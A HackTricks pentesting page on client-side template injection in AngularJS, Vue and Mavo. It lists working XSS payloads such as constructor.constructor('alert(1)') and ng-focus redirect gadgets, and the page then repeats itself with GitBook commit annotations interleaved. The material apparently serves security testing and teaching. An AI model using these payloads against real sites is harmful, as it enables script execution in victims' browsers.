hacktricks/pentesting-web/client-side-template-injection-csti.md

# Client Side Template Injection (CSTI)

## Summary

It is like a [**Server Side Template Injection**](ssti-server-side-template-injection/) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim.

The way to **test** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable** you will see a `0` and if not you will see the original: `{{ 7-7 }}`

## AngularJS

&#x20;AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute (also known as an AngularJS directive). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.\
For example, if your **input** is being **reflected** inside the **body** of the HTML and the body is defined with `ng-app`:  **`<body ng-app>`**

You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**: &#x20;

```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}
<input ng-focus=$event.view.alert('XSS')>

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```

You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) &#x20;

{% hint style="danger" %}
****[**Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
{% endhint %}

## VueJS

You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\
Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)

And the **source code** of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)

```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```

A really good post in CSTI in VUE can be found in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V3**

```
{{_openBlock.constructor('alert(1)')()}}
```

Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)

### **V2**

```
{{constructor.constructor('alert(1)')()}}
```

Credit: [Mario Heiderich](https://twitter.com/cure53berlin)

**Check more VUE payloads in** [**https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected**](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)****

## Mavo

Payload:&#x20;

```
[7*7]
[(1,alert)(1)]
<div mv-expressions="{{ }}">{{top.alert(1)}}</div>
[self.alert(1)]
javascript:alert(1)%252f%252f..%252fcss-images
[Omglol mod 1 mod self.alert (1) andlol]
[''=''or self.alert(lol)]
<a data-mv-if='1 or self.alert(1)'>test</a>
<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>
<a href=[javascript&':alert(1)']>test</a>
[self.alert(1)mod1]
```

**More payloads in** [**https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations**](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)****

## **Brute-Force Detection List**

{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`# Client Side Template Injection (CSTI)`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`## Summary`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`It is like a [Server Side Template Injection](ssti-server-side-template-injection/) but in the client. The SSTI can allow you the execute code on the remote server, the CSTI could allow you to execute arbitrary JavaScript code in the victim.`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			The way to test for this vulnerability is very similar as in the case of SSTI, the interpreter is going to expect something to execute between doubles keys and will execute it. For example using something like: `{{ 7-7 }}` if the server is vulnerable you will see a `0` and if not you will see the original: `{{ 7-7 }}`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00			`## AngularJS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00			AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the `ng-app` attribute (also known as an AngularJS directive). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces.\
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			For example, if your input is being reflected inside the body of the HTML and the body is defined with `ng-app`: `<body ng-app>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`You can execute arbitrary JavaScript code using curly braces adding to the body: `
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			```javascript
			`{{$on.constructor('alert(1)')()}}`
			`{{constructor.constructor('alert(1)')()}}`
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`<input ng-focus=$event.view.alert('XSS')>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`<!-- Google Research - AngularJS -->`
			`<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>`
			```

GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00			`You can find a very basic online example of the vulnerability in AngularJS in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/) `
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`{% hint style="danger" %}`
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			**[Angular 1.6 removed the sandbox**](http://blog.angularjs.org/2016/09/angular-16-expression-sandbox-removal.html#:\~:text=The%20Angular%20expression%20sandbox%20will,smaller%20and%20easier%20to%20maintain.\&text=Removing%20the%20expression%20sandbox%20does,surface%20of%20Angular%201%20applications.) so from this version a payload like `{{constructor.constructor('alert(1)')()}}` or `<input ng-focus=$event.view.alert('XSS')>` should work.
GitBook: [master] 2 pages modified 2021-06-29 12:49:13 +00:00			`{% endhint %}`

GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00			`## VueJS`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`You can find a vulnerable vue.js implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh)\`
			Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor\(%27alert\(%22foo%22\)%27\)\(\)%7D%7D)
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
			`And the source code of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)`

			```markup
			`<!-- Google Research - Vue.js-->`
			"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
			```

GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00			`A really good post in CSTI in VUE can be found in [https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`

GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`### V3`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`{{_openBlock.constructor('alert(1)')()}}`
			```

			`Credit: [Gareth Heyes, Lewis Ardern & PwnFunction](https://portswigger.net/research/evading-defences-using-vuejs-script-gadgets)`

			`### V2`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`{{constructor.constructor('alert(1)')()}}`
			```

			`Credit: [Mario Heiderich](https://twitter.com/cure53berlin)`

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`Check more VUE payloads in [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#vuejs-reflected)****`
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00
			`## Mavo`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2851] update vue 2021-11-22 11:32:00 +00:00			`Payload: `
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			```
GitBook: [master] 3 pages modified 2021-06-25 16:39:43 +00:00			`[7*7]`
			`[(1,alert)(1)]`
			`<div mv-expressions="{{ }}">{{top.alert(1)}}</div>`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`[self.alert(1)]`
GitBook: [master] 2 pages modified 2021-02-25 11:39:28 +00:00			`javascript:alert(1)%252f%252f..%252fcss-images`
			`[Omglol mod 1 mod self.alert (1) andlol]`
GitBook: [master] 3 pages modified 2021-06-25 16:39:43 +00:00			`[''=''or self.alert(lol)]`
			`<a data-mv-if='1 or self.alert(1)'>test</a>`
			`<div data-mv-expressions="lolx lolx">lolxself.alert('lol')lolx</div>`
			`<a href=[javascript&':alert(1)']>test</a>`
			`[self.alert(1)mod1]`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			```

GitBook: [#2876] save 2021-11-30 16:46:07 +00:00			`More payloads in [https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations](https://portswigger.net/research/abusing-javascript-frameworks-to-bypass-xss-mitigations)****`
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00
GitBook: [master] 10 pages modified 2021-06-27 21:56:13 +00:00			`## Brute-Force Detection List`

GitBook: [#2777] gitbookissooooo slow I cannot write 2021-10-18 11:21:18 +00:00			`{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}`